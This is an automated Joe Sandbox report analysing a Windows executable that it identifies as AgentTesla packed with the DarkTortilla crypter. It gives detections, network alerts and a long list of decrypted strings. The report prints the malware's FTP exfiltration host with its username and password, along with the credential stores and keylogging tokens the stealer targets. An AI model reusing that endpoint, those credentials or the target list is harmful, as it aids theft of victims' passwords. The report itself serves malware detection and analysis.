Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wva4mZuUb4.exe

Overview

General Information

Sample name:wva4mZuUb4.exe
renamed because original name is a hash value
Original sample name:872f1970c19bbf2031fe43f9ed034f1edd2763e6ecda2de368336da3312d8463.exe
Analysis ID:1569286
MD5:c6ad6edfa92898ce230177f0ecb4890c
SHA1:49b4e85cbf95afab5be60b3272370886418d64e9
SHA256:872f1970c19bbf2031fe43f9ed034f1edd2763e6ecda2de368336da3312d8463
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • wva4mZuUb4.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\wva4mZuUb4.exe" MD5: C6AD6EDFA92898CE230177F0ECB4890C)
    • InstallUtil.exe (PID: 2436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000A.00000002.2491018423.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 10 entries
              SourceRuleDescriptionAuthorStrings
              0.2.wva4mZuUb4.exe.401b818.2.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.wva4mZuUb4.exe.3f9dfba.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.wva4mZuUb4.exe.3f744ea.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.wva4mZuUb4.exe.3f4aa0a.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      0.2.wva4mZuUb4.exe.3ff153a.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Click to see the 8 entries
                        No Sigma rule has matched
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T17:29:52.838168+010020299271A Network Trojan was detected192.168.2.749835162.241.203.3021TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T17:29:53.773083+010028555421A Network Trojan was detected192.168.2.749846162.241.203.3044938TCP
                        2024-12-05T17:29:53.893896+010028555421A Network Trojan was detected192.168.2.749846162.241.203.3044938TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: wva4mZuUb4.exeAvira: detected
                        Source: http://aminhacorretora.com.brAvira URL Cloud: Label: malware
                        Source: http://ftp.aminhacorretora.com.brAvira URL Cloud: Label: malware
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
                        Source: wva4mZuUb4.exeReversingLabs: Detection: 71%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: wva4mZuUb4.exeJoe Sandbox ML: detected
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: /log.tmp
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: .html
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <html>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </html>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: .html
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <html>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </html>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>[
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ]<br>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: .html
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: .zip
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Time:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>User Name:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>CPU:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>RAM:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: IP Address:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <hr>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: New
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: IP Address:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: false
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: false
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: false
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: false
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: false
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: true
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: false
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ftp://ftp.aminhacorretora.com.br
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: logsftp@aminhacorretora.com.br
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: _yA=,M5*J?KH
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: false
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: false
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: appdata
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: XVWmeW
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: XVWmeW.exe
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: XVWmeW
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Type
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <hr>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <b>[
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ]</b> (
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: )<br>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {BACK}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {ALT+F4}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {TAB}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {ESC}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {Win}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {KEYUP}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {DEL}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {END}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {HOME}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {Insert}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {NumLock}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {PageDown}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {PageUp}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {ENTER}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F1}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F2}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F3}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F4}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F5}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F6}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F7}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F8}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F9}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F10}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F11}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {F12}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: control
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {CTRL}
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: &amp;
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: &lt;
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: &gt;
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: &quot;
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <hr>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: logins
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: IE/Edge
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Windows Secure Note
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Web Credentials
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Windows Credentials
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SchemaId
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pResourceElement
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pIdentityElement
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pPackageSid
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: IE/Edge
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UC Browser
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UCBrowser\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Login Data
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: journal
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: wow_logins
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Safari for Windows
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <array>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <dict>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <string>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </string>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <string>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </string>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <data>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </data>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: credential
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: QQ Browser
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Profile
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: entries
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: category
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: str3
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: str2
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: blob0
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: password_value
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: IncrediMail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PopPassword
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SmtpPassword
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Accounts_New
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PopPassword
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SmtpPassword
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SmtpServer
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: EmailAddress
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Eudora
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: current
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Settings
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SavePasswordText
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Settings
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ReturnAddress
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Falkon Browser
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \browsedata.db
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: autofill
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ClawsMail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Claws-mail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \clawsrc
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \clawsrc
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: passkey0
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \accountrc
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: smtp_server
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: address
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: account
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \passwordstorerc
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Flock Browser
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: APPDATA
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: signons3.txt
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: DynDns
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: username=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: password=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: t6KzXhCh
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: global
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: accounts
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: account.
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: username
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: account.
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Psi/Psi+
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: name
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Psi/Psi+
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: APPDATA
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Psi\profiles
